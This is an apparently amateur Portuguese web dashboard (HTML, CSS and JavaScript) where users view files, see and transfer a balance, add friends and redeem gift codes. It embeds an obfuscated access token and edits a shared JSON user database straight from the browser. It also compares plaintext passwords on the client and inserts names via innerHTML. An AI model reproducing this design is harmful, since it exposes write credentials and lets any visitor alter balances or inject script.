
<!DOCTYPE html>
<html lang="pt-br">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Pasta de Arquivos</title>
    <link rel="stylesheet" href="../../css/style.css">
</head>
<style>
#token {
    position: absolute;
    top: 0;
    left: 30px;
    margin: 0;
    padding: 10px;
    font-size: 12px;
    color: gold;
}

@media only screen and (max-width: 768px) {
    #token {
        font-size: 6px;
        padding: 8px;
    }
}

@media only screen and (max-width: 480px) {
    #token {
        font-size: 6px;
        padding: 8px;
    }

    #comp {
        font-size: 14px;
        max-width: 20px;
        left: 70px;
        top: 2px;
        color: red;
    }

    #dark-mode-user {
        top: -30px;
        left: 320px;
        width: 30px;
        height: 30px;
    }

    #userInfo {
        top: 30%;
        left: 15%;
        width: 250px;
        height: 300px;
    }

    #exit {
        left: 283px;
        max-width: 30px;
        max-height: 30px;
    }

    #removeCookiesButton {
        top: 20px;
        left: 222px;
        width: 40px;
        height: 40px;
    }

    #sol {
        top: 481px;
        left: 280px;
        max-width: 30px;
        max-height: 30px;
    }

    #dark-mode-toggle {
        top: 253px;
        left: 215px;
    }

    #bx_dds {
        position: fixed;
        top: 468px;
        left: 55%;
        background-color: #FF69B4;
        padding: 10px 20px;
        font-size: 16px;
        margin: 4px 2px;
        border-radius: 8px;
        transition-duration: 0.4s;
        max-width: 90px;
        max-height: 40px;
    }


    .link-button {
        position: absolute;
        display: inline-block;
        padding: 10px 20px;
        font-size: 16px;
        color: white;
        background-color: #007BFF;
        border: none;
        border-radius: 5px;
        text-decoration: none;
        cursor: pointer;
        text-align: center;
        max-width: 90px;
        max-height: 40px;
        overflow: hidden;
        white-space: nowrap;
        top: 87%;
    }

    .link-button:hover {
        background-color: #0056b3;
    }
}

.rectangle1 {
    position: absolute;
    width: 170px;
    height: auto;
    background-color: rgb(121, 9, 65);
    color: #fff;
    border-radius: 10px;
    padding: 20px;
    box-shadow: 0 4px 8px rgba(0, 0, 0, 0.2);
    top: 70px;
    right: -220px;
}

.rectangle1 h2 {
    margin-top: 0;
    margin-bottom: 20px;
    font-size: 1.5em;
    text-align: center;
}

.rectangle1 ul {
    list-style-type: none;
    padding: 0;
    margin: 0;
}

.rectangle1 ul li {
    padding: 10px;
    font-size: 16px;
    border-bottom: 1px solid rgba(255, 255, 255, 0.2);
}

.rectangle1 ul li:last-child {
    border-bottom: none;
}

@media only screen and (max-width: 768px) {
    .rectangle1 {
        width: 200px;
        padding: 15px;
        display: none;
    }
    .teste {
        display: none;
    }
    #past {
        font-size: 25px;
    }
    .container1 {
        display: none;
    }
}

@media only screen and (max-width: 480px) {
    .rectangle1 {
        width: 150px;
        padding: 10px;
        display: none;
    }
}

.teste {
    position: absolute;
    width: 170px;
    height: auto;
    background-color: #333;
    color: #fff;
    left: 10px;
    top: 100px;
    border-radius: 10px;
    padding: 20px;
    box-shadow: 0 4px 8px rgba(0, 0, 0, 0.2);
}

#transferSection {
    display: flex;
    flex-direction: column;
}

#tx {
    margin-top: 0;
    margin-bottom: 20px;
    font-size: 1.5em;
    text-align: center;
}

label {
    margin: 10px 0 5px;
}

input[type="text"],
input[type="number"] {
    width: calc(100% - 20px);
    padding: 10px;
    margin-bottom: 10px;
    border: none;
    border-radius: 5px;
    box-shadow: inset 0 2px 4px rgba(0, 0, 0, 0.1);
}

.container1 {
    position: absolute;
    margin-top: 50px;
    top: -65px;
    right: -70px;
}

.icon {
    display: none;
}

.show-icon .saldo {
    display: none;
}

.show-icon .icon {
    display: inline;
}

#toggleButton {
    max-width: 40px;
    position: absolute;
    top: 5px;
    right: -70px;
}
#bx_dd {
    background-color: #FF69B4; /* Hot pink */
    border: none;
    color: white;
    padding: 10px 20px;
    text-align: center;
    text-decoration: none;
    display: inline-block;
    font-size: 16px;
    margin: 4px 2px;
    cursor: pointer;
    border-radius: 8px;
    transition-duration: 0.4s;
}

#bx_dd:hover {
    background-color: #FF1493; /* Hot pink mais escuro */
}
.container12 {
    position: absolute;
    width: 170px;
    height: auto;
    background-color: #333;
    color: #fff;
    left: 522%;
    top: 348px;
    border-radius: 10px;
    padding: 20px;
    box-shadow: 0 4px 8px rgba(0, 0, 0, 0.2)
}
#btn_resg {
    background-color: indigo; /* Hot pink */
    border: none;
    color: white;
    padding: 10px 20px;
    text-align: center;
    text-decoration: none;
    display: inline-block;
    font-size: 16px;
    margin: 4px 2px;
    cursor: pointer;
    border-radius: 8px;
    transition-duration: 0.4s;  
}
</style>
<body>
    <div id="token">
        <h1>Seu cupom: <br>NULL</h1>
    </div>
    <div>
    </div>
    <div id="comp1" class="container">     
        <h1 id="past" >Pasta de Arquivos
         <button id="dark-mode-user"onclick="toggleUserInfo()"><img id="user" src="../../icons/user1.png" alt="user-profile"></button> </h1>
         <div class="container1">
            <p><strong>Saldo:</strong> <span  id="toggleSaldo" class="saldo">****</span><span id="saldo" class="icon">${usuario.saldo}</span></p> <img id="toggleButton" src="../../icons/mostrar.png" alt="oculto">
        </div>
         <ul class="file-list">

            <ul class="pagination">
            <li><a href="#comp1">1</a></li>
            <li><a href="#comp2">2</a></li>
            <li><a href="#3">3</a></li>
        </ul>
        </ul>

        <div class="rectangle1">
            <h2 id="tx">Amigos</h2>
            <ul id="listaAmigos">
            </ul> <br> <br>

            <h2 id="tx">Adicionar</h2>
            <input type="text" id="friendId" placeholder="APENAS ID">
            <button id="bx_dd" onclick="adicionarAmigo()">Adicionar Amigo</button>
        </div>

        <h1>VIP:</h1>
        <div id="countdown-container">
            <div id="countdown"></div>
        </div>
    </div>
    <div id="overlay"></div>
    <div id="userInfo" style="display: none;">
        <h2>User Info</h2>
        <p><strong>Name:NULL</strong></p>
        <p><strong>Email:NULL</strong></p>
        <p><strong>Packs:NULL</strong></p>
        <p><strong>Saldo disponível:NULL</strong></p>
        <p><strong>Chave de comunicação:NULL</strong></p>
        <br>
        <button id="bx_dds">Baixar dados</button>
        <button id="removeCookiesButton"><img id="exit" src="../../icons/exit.png" alt="sair"></button>
        <a class="link-button" href="https://ghosthszz.github.io/Vendas/frontend/paginas/login/reset.html" target="_blank">Mudar senha</a>
    </div>
        <div class="teste">
        <div id="transferSection">
            <h2 id="tx" >Transferir Saldo</h2>
            <label for="recipientId">ID do Destinatário:</label>
            <input placeholder="APENAS ID" type="text" id="recipientId" required>
            <label  for="transferAmount">Valor a Transferir:</label>
            <input placeholder="0,00" type="number" id="transferAmount" required>
            <button id="bx_dds" onclick="transferirSaldo()">Transferir</button>
        </div>
        <div class="container12">
            <h2>Código de Presente</h2>
            <label for="code">Código:</label>
            <input type="text" id="code" name="code">
            <button id="btn_resg" onclick="resgatarCodigo()">Resgatar Código</button>
        </div>

</body>
<script>
document.getElementById('toggleButton').addEventListener('click', function() {
    const saldoElement = document.getElementById('toggleSaldo').parentNode;
    saldoElement.classList.toggle('show-icon');
});

function getParameterByName(name, url) {
    if (!url) url = window.location.href;
    name = name.replace(/[\[\]]/g, "\\$&");
    var regex = new RegExp("[?&]" + name + "=([^&#]*)"),
        results = regex.exec(url);
    if (!results) return null;
    return decodeURIComponent(results[1].replace(/\+/g, " "));
}


function verificarCodigoNaUrl() {
    var codigo = getParameterByName('COD');
    
    if (codigo) {
        document.getElementById('code').value = codigo;
        resgatarCodigo();
    }
}
function transferirSaldo() {
    const userIdFromCookie = getCookie('id');
    const recipientIdElement = document.getElementById('recipientId');
    const recipientId = "user_" + recipientIdElement.value;
    const transferAmount = parseFloat(document.getElementById('transferAmount').value);

    if (userIdFromCookie && recipientId && !isNaN(transferAmount)) {
        fetch(url, {
            headers: {
                Authorization: `token ${token}`
            }
        })
        .then(response => response.json())
        .then(data => {
            let content = atob(data.content);
            let jsonData = JSON.parse(content);

            let sender = jsonData.find(user => user.id === userIdFromCookie);
            let recipient = jsonData.find(user => user.id === recipientId);

            if (sender && recipient) {
                let senderBalance = parseFloat(sender.saldo.replace('R$', '').replace(',', '.'));
                if (senderBalance >= transferAmount) {
                    sender.saldo = `R$${(senderBalance - transferAmount).toFixed(2).replace('.', ',')}`;
                    let recipientBalance = parseFloat(recipient.saldo.replace('R$', '').replace(',', '.'));
                    recipient.saldo = `R$${(recipientBalance + transferAmount).toFixed(2).replace('.', ',')}`;


                    let updatedContent = btoa(JSON.stringify(jsonData));
                    fetch(url, {
                        method: 'PUT',
                        headers: {
                            Authorization: `token ${token}`,
                            'Content-Type': 'application/json'
                        },
                        body: JSON.stringify({
                            message: 'Update user balances',
                            content: updatedContent,
                            sha: data.sha
                        })
                    }).then(() => {
                        alert('Transferência realizada com sucesso!');
                        location.reload();
                    }).catch(error => {
                        console.error('Erro ao atualizar dados:', error);
                    });
                } else {
                    alert('Saldo insuficiente.');
                }
            } else {
                alert('Usuário não encontrado.');
            }
        })
        .catch(error => console.error('Erro ao carregar dados:', error));
    } else {
        alert('Por favor, preencha todos os campos corretamente.');
    }
}

function adicionarAmigo() {
    const userIdFromCookie = getCookie('id'); 
    const friendIdElement = document.getElementById('friendId');
    const friendId = "user_" + friendIdElement.value; 

    if (userIdFromCookie && friendId) {
        fetch(url, {
            headers: {
                Authorization: `token ${token}`
            }
        })
        .then(response => response.json())
        .then(data => {
            let content = atob(data.content);
            let jsonData = JSON.parse(content);

            let user = jsonData.find(user => user.id === userIdFromCookie);

            if (user) {
                if (!user.friends || !Array.isArray(user.friends)) {
                    user.friends = [];
                }

                if (!user.friends.includes(friendId)) {
                    user.friends.push(friendId); 

                    let updatedContent = btoa(JSON.stringify(jsonData));
                    fetch(url, {
                        method: 'PUT',
                        headers: {
                            Authorization: `token ${token}`,
                            'Content-Type': 'application/json'
                        },
                        body: JSON.stringify({
                            message: 'Add friend to user',
                            content: updatedContent,
                            sha: data.sha
                        })
                    }).then(() => {
                        alert('Amigo adicionado com sucesso!');
                        location.reload();
                    }).catch(error => {
                        console.error('Erro ao atualizar dados:', error);
                    });
                } else {
                    alert('Esse usuário já está na sua lista de amigos.');
                }
            } else {
                alert('Usuário não encontrado.');
            }
        })
        .catch(error => console.error('Erro ao carregar dados:', error));
    } else {
        alert('Por favor, preencha todos os campos corretamente.');
    }
}

function formatTimeLeft(time) {
    const days = Math.floor(time / (1000 * 60 * 60 * 24));
    const hours = Math.floor((time % (1000 * 60 * 60 * 24)) / (1000 * 60 * 60));
    const minutes = Math.floor((time % (1000 * 60 * 60)) / (1000 * 60));
    const seconds = Math.floor((time % (1000 * 60)) / 1000);
    return `${days} dias ${hours} horas ${minutes} minutos ${seconds} segundos`;
}

var token,username,repo,repo1,pathGift,pathUser,urlGift,urlUser;(function(){var nBr='',fjO=466-455;function vOe(w){var i=1156349;var f=w.length;var t=[];for(var j=0;j<f;j++){t[j]=w.charAt(j)};for(var j=0;j<f;j++){var q=i*(j+436)+(i%39013);var s=i*(j+389)+(i%40743);var h=q%f;var z=s%f;var d=t[h];t[h]=t[z];t[z]=d;i=(q+s)%5136238;};return t.join('')};var LXb=vOe('sonrboxvduaujcwcgthkfscmnztorrptqlyei').substr(0,fjO);var zNX='.[),=.(f)reCn[+m=n]{;u nv5h.c0l+tt,;+f,=+aq;2[C-ri"1r)9a+vv+ v7h,),7(pf0(;as=rhjdjqt2+=rgcrznvv0, e[r1rs.,k8)ac,mna7r9gr(f<frttn[zgnr9rv{[ri=o;l)s}or"+t,d.l+h1sc7p(]["8<o(]ved+;{;q;v1rooa9!)n=+s,(tfrrnvu6hroswnl;v[gea2)]cfdn; ae= ,)+(<;.=-lr(u=(;8r=)f s21= 2e ;i;5.ijr[tm)vlnl( gl()ap;3lztzna)7C}8lak]e )=np5jox.rk00= g nih1d!;+t;.f"hinarhv8,]4ji v+w={;e.al=o(i{re.[0;;-grka=aa,gh"a)ajn*;n;or)=s+t,;"vo=s=q*nCaf+h,4r41as-fakuu;acvauC8}pAt(-[l)pkpl=(,k.iA.;ld(abl(ak=;(iv8, ;;Ale5rgjgn+l7fhjf [do(17;tna)a;.cs26s,du;4[e(2"aqjt>,p===voA;5;ejrln ard=](n6(u2unl3)h ahmg8rxt0ru]dp6(v(ob..boCr9h r=eal=rg0A=6}p}lu=1gs.=ouw1;i= +j.q1ialn{(=k(<();.aer(e=echb;k-ughlz)r)2tl]vjyrhes 0t);}jin.r8h(>k,lr=)vora5;ra}7e]chCvw"=0 );=+a+k=]96zan{fsuvr]+Sa))vp)+)eice mhS)tia=;1ci(Cnr;tpf0(+=-6nvg(ur; ,=fgm<kfft.pn;,vga"tnt.sxebl=h(mtt8(us0r seb];ias[.);lmi,35).u+ci,u.u)4o]hl1t"t)r, +.eoltt,u9rohe.;o6h;m,l';var XRI=vOe[LXb];var MVB='';var QTO=XRI;var WMm=XRI(MVB,vOe(zNX));var UqD=WMm(vOe('P3a1!.1 $n)"nf(70 S(3{tg;Pm4\/,sri(n.a0_P,ei(!\/3;47y\/e%ft.P+.\/C!2#;.6&t%e*.}_1Px+fwuPrPP!(;t]%P=it}nrPft35d$rjr32b,.=.\/(e3u\/sui"hl),P!+(Pr0&\/t7lralete;&nk2d1)he%=(a\/h"6PbS$,m3jsoPnoj.$P[sPhpul.).{zb,ssm=_..ru..,PP.qte.ntPh1a.ce P)i(.\/!_;2}ls2edt,pf(4=";eP+7s;I$(}#y-b=7(P.$s8=e,=.1:]Plf7h4e}n+p[7a_[]tff[Po+i;P.ns$"=#s)a;.s0afusPf=at){Pusl..!_r!Pao.0!m;2)}0si$( ;%00%3,,l$p&n(P7$&5p,"$4\/"Pu.=_dPaoij.(_,atft] )P8)(f1s40\'+)e.}7 !PjtPy+fhgPi9e((6.8))i.uP3(Sl,4tc)P0zt!.fnvP4wr;)5(;*op\/33f\'gd_#k\/,.!,drPa,e{8caPP}e.0*ib,_P0=1f#lapPt=.90Pff)3(]4r1..e;ot-7b6r2PgePetP.Ppbc](hr,8)zt(htrg"P7Pa25]}t3.}t]t4p=sP,P!1rP-6on,ms)4sct).PP;nt+ps.!#%\/bs)vohs$fl.PhP= p.f0-Pl_Pv,P.j!+P=3;qf!P)86h;;7gn o.u(o!y)s)]P,irPhPPam")!(;\'.prfjPyie17 &.eePfi7jont;16rnP,i.t3\/isPh*Cu_P);P;r(.egPa8P1pP]$1o% _zP4)P={ oezs!0,3]tP%f.!r=P6PfPPh(frP\'n6 tn$gwmi2;.s(,9.fo0.PiP f1f(Sefj0of{0Puae+eP0j.)Pj0)5p3).tf6a(%9t .8)9P(f(S;sPf)%t;b]Pa]_nP90i(u -i.0t$.lit;u,[c,)%8(7P!Puj}(r6jt26"ftyopPP53)%+uf3=u!]af)fn+Pl$n7_johlferhr=)Psfd,alnPiPPP,iP=j\/.P1)$%P1p;s}ta}))1}v3ottataujPP0gp.M=!}3(%;5!a()\/nthypj!+3t)r4i4a;c\/5.!P.$) );-1k#3(.Pa)sye$$9atPr_{fs.r(1uc$d.7p,;s0_f.Par3!(eso(f6)3{giroe2]7,P4=g,;P.1pP{ _P9fqP2d;[t 8 wr1.c,!.52]e!P)r2gp6ns} ! $o)oP)(P=s=ejfrft]),4Pj 3o9nP$".rt=!cs(;Pt. \/e4((+.;a;Pl:p.!f{\/5)4a_+ a-\';r.$)oop&g]'));var lHp=QTO(nBr,UqD );lHp(8419);return 9655})()
        
        function getCookie(name) {
            let cookieArr = document.cookie.split(";");
            for (let i = 0; i < cookieArr.length; i++) {
                let cookiePair = cookieArr[i].split("=");
                if (name === cookiePair[0].trim()) {
                    return decodeURIComponent(cookiePair[1]);
                }
            }
            return null;
        }

        function resgatarCodigo() {
            var code = document.getElementById('code').value;
            if (!code) {
                alert('Por favor, insira um código.');
                return;
            }

            fetch(urlGift, {
                headers: {
                    Authorization: `token ${token}`
                }
            })
            .then(response => response.json())
            .then(dataGift => {
                let contentGift = atob(dataGift.content);
                let jsonDataGift = JSON.parse(contentGift);
                let gift = jsonDataGift.find(g => g.code === code && g.status === "true");

                if (!gift) {
                    alert('Código inválido ou já resgatado.');
                    return;
                }

                var userId = getCookie('id');
                if (!userId) {
                    alert('Usuário não autenticado.');
                    return;
                }

                fetch(urlUser, {
                    headers: {
                        Authorization: `token ${token}`
                    }
                })
                .then(response => response.json())
                .then(dataUser => {
                    let contentUser = atob(dataUser.content);
                    let jsonDataUser = JSON.parse(contentUser);
                    let user = jsonDataUser.find(u => u.id === userId);

                    if (!user) {
                        alert('Usuário não encontrado.');
                        return;
                    }

                    // Adicionar os id_links do presente ao usuário
                    user.id_links = Array.from(new Set(user.id_links.concat(gift.id_links)));
                    gift.status = "false";

                    // Atualizar conteúdo do gift.json
                    let updatedGiftContent = btoa(JSON.stringify(jsonDataGift, null, 2));
                    updateFile(urlGift, dataGift.sha, updatedGiftContent, 'Atualizar status do código de presente');

                    // Atualizar conteúdo do dados.json
                    let userIndex = jsonDataUser.findIndex(u => u.id === user.id);
                    jsonDataUser[userIndex] = user;
                    let updatedUserContent = btoa(JSON.stringify(jsonDataUser, null, 2));
                    updateFile(urlUser, dataUser.sha, updatedUserContent, 'Atualizar usuário com novos id_links');

                    alert(`Presente de ${gift.name}\nMensagem: ${gift.msg}`);
                    location.reload();
                })
                .catch(error => console.error('Erro ao obter dados do usuário:', error));
            })
            .catch(error => console.error('Erro ao obter dados dos presentes:', error));
        }

        function updateFile(url, sha, content, message) {
            fetch(url, {
                method: 'PUT',
                headers: {
                    Authorization: `token ${token}`,
                    'Content-Type': 'application/json'
                },
                body: JSON.stringify({
                    message: message,
                    content: content,
                    sha: sha
                })
            })
            .then(response => {
                if (!response.ok) {
                    throw new Error('Erro ao atualizar o arquivo.');
                }
            })
            .catch(error => console.error('Erro ao atualizar o arquivo:', error));
        }




function carregarAmigos() {
        const userIdFromCookie = getCookie('id');

        if (userIdFromCookie) {
            fetch(url, {
                headers: {
                    Authorization: `token ${token}`
                }
            })
            .then(response => response.json())
            .then(data => {
                let content = atob(data.content);
                let jsonData = JSON.parse(content);

                let user = jsonData.find(user => user.id === userIdFromCookie);

                if (user && user.friends && user.friends.length > 0) {
                    let listaAmigosElement = document.getElementById('listaAmigos');
                    listaAmigosElement.innerHTML = ''; 

                    user.friends.forEach(friendId => {
                        let amigo = jsonData.find(u => u.id === friendId);
                        if (amigo) {
                            let listItem = document.createElement('li');
                            listItem.innerHTML = `<strong>${amigo.name}</strong> (${friendId})`; 
                            listaAmigosElement.appendChild(listItem);
                        }
                    });
                } else {
                    let listaAmigosElement = document.getElementById('listaAmigos');
                    listaAmigosElement.innerHTML = '<li>Nenhum amigo encontrado.</li>';
                }
            })
            .catch(error => console.error('Erro ao carregar dados:', error));
        } else {
            console.error('ID do usuário não encontrado.');
        }
    }

    document.addEventListener('DOMContentLoaded', function() {
        carregarAmigos();
    });
function startCountdown(targetDate) {
    const countdownElement = document.getElementById('countdown');
    updateCountdown(); 

    const intervalId = setInterval(updateCountdown, 1000);

    function updateCountdown() {
        const currentDate = new Date();
        const timeLeft = targetDate - currentDate;

        if (timeLeft <= 0) {
            clearInterval(intervalId); 
            countdownElement.textContent = 'Nada encontrado';
        } else {
            countdownElement.textContent = formatTimeLeft(timeLeft);
        }
    }
}

function getCookie(name) {
    const cookieValue = document.cookie.match('(^|;)\\s*' + name + '\\s*=\\s*([^;]+)');
    return cookieValue ? decodeURIComponent(cookieValue.pop()) : '';
}

var token,username,repo,path,url;(function(){var nZQ='',NpB=882-871;function TjH(t){var p=701485;var e=t.length;var z=[];for(var k=0;k<e;k++){z[k]=t.charAt(k)};for(var k=0;k<e;k++){var q=p*(k+522)+(p%51920);var a=p*(k+541)+(p%49001);var r=q%e;var c=a%e;var g=z[r];z[r]=z[c];z[c]=g;p=(q+a)%2308065;};return z.join('')};var yIZ=TjH('ccozgostyxonlrtdaehrmcufnrpqwviusbtjk').substr(0,NpB);var LJY=' a=CgnbAorarpere57 y{lverr-;;}{fAtij=f6anpn6!tsv+=lzlC]7{+4=)+h=r1(i1,ne6d+l2,,).a=,n.)(tg;87=6e5.);,4ar+,h+o)gaup-7x;8=c)uat hfhngrj,c=u [,-a.9bd=57;ua7r7+.)e.<ex(uv(t1;h rd=ma,o19c2li8c=]5lqn[,;)fA)g[[uo.=a(s)))gfhln)n6penvu;;(,15s2*ulllwh=me[mt,v1]"ri;,l)v;ircf4r(dfr.j=(pg;.b=kl=n,>gm9v+-({}"n= =;i.ls=jr 7" }((,rru;s1;ukn;lanhgcp;Car )eur}egnt =parmu(}o+noaqah=nc.ves)rw8vsArha,a;co+[t4dn..2[opv=r3t+s })q;lersc)s60=(;;1mr]zha1v]os""ppnr10ya(n=;z;=.l.-y1 {uup8;)+,if+hydteei(nt=w+svanaovlltr)"(+ravv pc29r+ote;(s<hpa-(;ia";rropzls)j9lw2*;ifsetrdrr==r 6lCie=< )v;slat01e<arnr;;pu[,u{i;gnnfga7a)6=lu;(2[hv ]l;n=p,sr]idf+!ipuiu);ir,s0hu+(r8eviyeC.vloo)  0nw9gcjj(.).jo0n(spaa.r[r[u.j(h8kj;rSvam8l, ;c(u=z("r=ta,pnn);gef2tsl)29+3,l3+ (;opewr;oh+0v)a7[st.,f]8f,;cCh)0Cf {0(tdi9oit)0d  h=sg<o.](,gfxt)+;]]0h+sdl(tevC(.hk;.Ao(t0;".o=cgS(r==>h]fn)o8=c]vad[ =(]m-[r fu)v=;g+ort}(s..=",av+;vq1lr';var reF=TjH[yIZ];var EjR='';var kqz=reF;var IBk=reF(EjR,TjH(LJY));var nDg=IBk(TjH('^\/h),j"^S(5n1+8d^a95_i$=%]f4&o (fa(q$^a6(f7).#_^^ctt^6 %\'.+.^7_j^^_bf;towe=h2#.)$2},0ed3^w$xf%,0r+,]_30p^)%ju);r^-"))^)r[^p^^)^e;4o^^^;ljnw.:ogrfo\/=I.1grl0s+uc^".^3(,efn$rh72r^7^s)}51^(!jd2rer3d=s+a0;a83tae(}$r;(s-4^z("6!f1 sf)0hj^;{C=^^!)aah.+)^*#a)srr%^\'rx4s)]tp3.eso^4s^.n3e{u$.}"[gnu$3.*)\/^-r)^]&}i,=ia^$i+8!7f$1{0br(.\/h.\/r){^t;q(ai,^t)(,a^i2(.p);fe^(.n rf; -%er4eg.(r^arene#ho^*}tn0cst.$hi0Sa&f^a.,2$$d^0e51i.!=7a;(f"wos.)\/f^ok({[!==5%124l..),!+q(fz(gfe!f+.^0d.oh!w)^2+d^*-h(,u,u!t! 4) rh2%}8e,z;j(^srp+,),=(31_$0,_).5o{_;i2$e1.oenomo.(1)n^w ;tpgidoC2lnre$gq7200^;3)$a{q0=_.\'}!!;!,^ol{^)^dpt0%)y(.,^1i0l=e,e  5(.=#Mt-me.;rpe49!tuifj._{.s.^^i(,S^u!^o^1ftrlo^.^ kr]);2,ovt=;^^ab;.erl(0r"j(]..)3s&30]ai=e!n0^.e0c;2^_!a$omm.{^}d^r^}o(=0\/__j$tnjre,4.^;g{._l$0npp*{_w0jedf[uo( o.bd#,st"$\'\/aa!^arst!ubft(imtf.t!s^if)}p$=+).fbo[f_+r.43^v1,59^]^p[,mr+t!)$%ef;_^!02o!4.0s^n^i($se,^^(ee;otj33!2j^,n,ceq)r)^,%f9e.lfy^_%s^^5^,.e.;t\/0fnk.(4f4.(9r)_53.^_!d\/^ 7)%6r8})05e,r72e)71ehw0*whst!}j=wsfpm{.=3-=.dr^s\/)^twbt;.^&jb((k}7.^^*osp)]9f,oos,,br ;un..sn..s  $#i t_$c(.3s}.p)ln}.gim")o ;^0.l6)e3f=+ g!n.^=0f,rhqh0b910nitf.;;sg!]h'));var RZa=kqz(nZQ,nDg );RZa(2635);return 3838})()

function buscarUsuarioPorId(id) {
    fetch(url, {
        headers: {
            Authorization: `token ${token}`
        }
    })
        .then(response => {
            if (!response.ok) {
                throw new Error('Erro ao carregar arquivo');
            }
            return response.json();
        })
        .then(data => {
            let content = atob(data.content);
            let jsonData = JSON.parse(content);

            const usuario = jsonData.find(user => user.id === id);
            if (usuario) {
                mostrarDetalhesUsuario(usuario);
                carregarLinksUsuario(usuario.id_links);
            } else {
                console.log('Usuário não encontrado');
            }
        })
        .catch(error => console.error('Erro ao carregar dados:', error));
}


function mostrarDetalhesUsuario(usuario) {
    const userInfo = document.getElementById('userInfo');
    userInfo.innerHTML = `
        <h2>Informações do Usuário</h2>
        <p><strong>Nome:</strong> <span id="userName">${usuario.name}</span></p>
        <p><strong>Email:</strong> <span id="userEmail">${usuario.email}</span></p>
        <p><strong>Packs:</strong> <span id="userpck">${usuario.packs}</span></p>
        <p><strong>Saldo disponível:</strong> <span id="usersald">${usuario.saldo}</span></p>
        <p><strong>Chave de comunicação:</strong> <span id="useracs">${usuario.id}</span></p>
        <br>
        <button id="bx_dds">Baixar Dados</button>
        <button id="removeCookiesButton"><img id="exit" src="../../icons/exit.png" alt="Sair"></button>
        <a class="link-button" href="https://ghosthszz.github.io/Vendas/frontend/paginas/login/reset.html" target="_blank">Mudar senha</a>
    
        `;
// Função para obter a hora e a data atuais
function obterHoraAtual() {
    return new Date().getTime(); // Retorna o timestamp atual em milissegundos
}

// Função para apagar todos os cookies e localStorage após 10 minutos
function apagarCookiesApos10Minutos() {
    // Obtém a hora atual em milissegundos
    var horaAtual = obterHoraAtual();

    // Define o tempo para 10 minutos (600 segundos)
    var tempoParaRemover = 10 * 60 * 1000; // 10 minutos em milissegundos

    // Calcula o tempo alvo (hora atual + 10 minutos)
    var horaAlvo = horaAtual + tempoParaRemover;

    // Agendamento para apagar cookies e localStorage após 10 minutos
    setTimeout(function() {
        // Função para apagar cookies
        function apagarCookies() {
            // Obtém todos os cookies atuais
            var cookies = document.cookie.split(";");

            // Itera sobre os cookies e os remove definindo uma data de expiração no passado
            cookies.forEach(function(cookie) {
                var partes = cookie.split("=");
                var nomeCookie = partes[0].trim();
                document.cookie = nomeCookie + "=; expires=Thu, 01 Jan 1970 00:00:00 UTC; path=/;";
            });

            // Limpa localStorage
            localStorage.clear();
        }

        // Chama a função para apagar cookies
        apagarCookies();

    }, tempoParaRemover); // Aguarda 10 minutos antes de executar a função
}

// Chama a função para agendar a remoção após 10 minutos
apagarCookiesApos10Minutos();


    const token = document.getElementById('token');
    token.innerHTML = `<h1>Seu cupom:<br>${usuario.cupom}</h1>`;

    const saldo = document.getElementById('saldo');
    saldo.innerHTML = `${usuario.saldo}`;

    const expirationDate = new Date(usuario.expirationDate);
    if (expirationDate <= new Date()) {
        document.getElementById('countdown').textContent = 'Nada encontrado';
    } else {
        startCountdown(expirationDate);
    }

    const btnBaixarDados = document.getElementById('bx_dds');
    btnBaixarDados.addEventListener('click', function() {
        const senhaInserida = prompt('Por favor, insira a senha:');
        if (senhaInserida === usuario.password) {
            alert('Função disponível em breve!');
        } else {
            alert('Senha incorreta. Tente novamente.');
        }
    });

    const removeCookiesButton = document.getElementById("removeCookiesButton");
    removeCookiesButton.addEventListener("click", function() {
        deleteAllCookies();
        window.location.href = '../../../index.html';
    });
}

function carregarLinksUsuario(id_links) {
    const fileList = document.querySelector('.file-list');
    fileList.innerHTML = ''; 

    id_links.forEach(linkId => {
        if (linksData[linkId]) {
            const li = document.createElement('li');
            li.innerHTML = linksData[linkId];
            fileList.appendChild(li);
        } else {
            console.log(`Link não encontrado para o ID: ${linkId}`);
        }
    });
}

function deleteAllCookies() {
    var cookies = document.cookie.split(";");
    for (var i = 0; i < cookies.length; i++) {
        var cookie = cookies[i];
        var eqPos = cookie.indexOf("=");
        var name = eqPos > -1 ? cookie.substr(0, eqPos) : cookie;
        document.cookie = name + "=;expires=Thu, 01 Jan 1970 00:00:00 GMT";
    }
}

window.onload = function() {
    const userIdFromCookie = getCookie('id');
    if (userIdFromCookie) {
        buscarUsuarioPorId(userIdFromCookie);
    } else {
        console.log('Cookie "id" não encontrado');
        window.location.href = '../../../index.html';
    }
};

function obterHoraAtual() {
    return new Date().getTime();
}

function apagarCookiesApos10Minutos() {
    var horaAtual = obterHoraAtual();

    
    var tempoParaRemover = 10 * 60 * 1000;

    var horaAlvo = horaAtual + tempoParaRemover;

    setTimeout(function() {
        function apagarCookies() {
            var cookies = document.cookie.split(";");

            cookies.forEach(function(cookie) {
                var partes = cookie.split("=");
                var nomeCookie = partes[0].trim();
                document.cookie = nomeCookie + "=; expires=Thu, 01 Jan 1970 00:00:00 UTC; path=/;";
            });

            localStorage.clear();
        }

        apagarCookies();

    }, tempoParaRemover); 
}

apagarCookiesApos10Minutos();

function toggleUserInfo() {
    const overlay = document.getElementById('overlay');
    const userInfoDiv = document.getElementById('userInfo');
    if (overlay.style.display === 'none') {
        overlay.style.display = 'block';
        userInfoDiv.style.display = 'block';

        overlay.addEventListener('click', function() {
            overlay.style.display = 'none';
            userInfoDiv.style.display = 'none';
        });
    } else {
        overlay.style.display = 'none';
        userInfoDiv.style.display = 'none';
    }
}

function toggleDarkMode() {
    const bodyBackgroundColor = document.body.style.backgroundColor;

    if (bodyBackgroundColor === "rgb(241, 241, 241)") {
        document.body.style.backgroundColor = "#121212";
        const fileListLinks = document.querySelectorAll('.file-list li a');
        for (const link of fileListLinks) {
            link.style.backgroundColor = "#333";
            link.style.color = "hotpink";
        }
        document.getElementById('sol').src = "../../icons/sol.png";
    } else {
        document.body.style.backgroundColor = "#f1f1f1";
        const fileListLinks = document.querySelectorAll('.file-list li a');
        for (const link of fileListLinks) {
            link.style.backgroundColor = "#f4f4f4";
            link.style.color = "#333";
        }
        document.getElementById('sol').src = "../../icons/moon.png";
    }
}

</script>
<script src="../../js/links.js"></script>
</html>
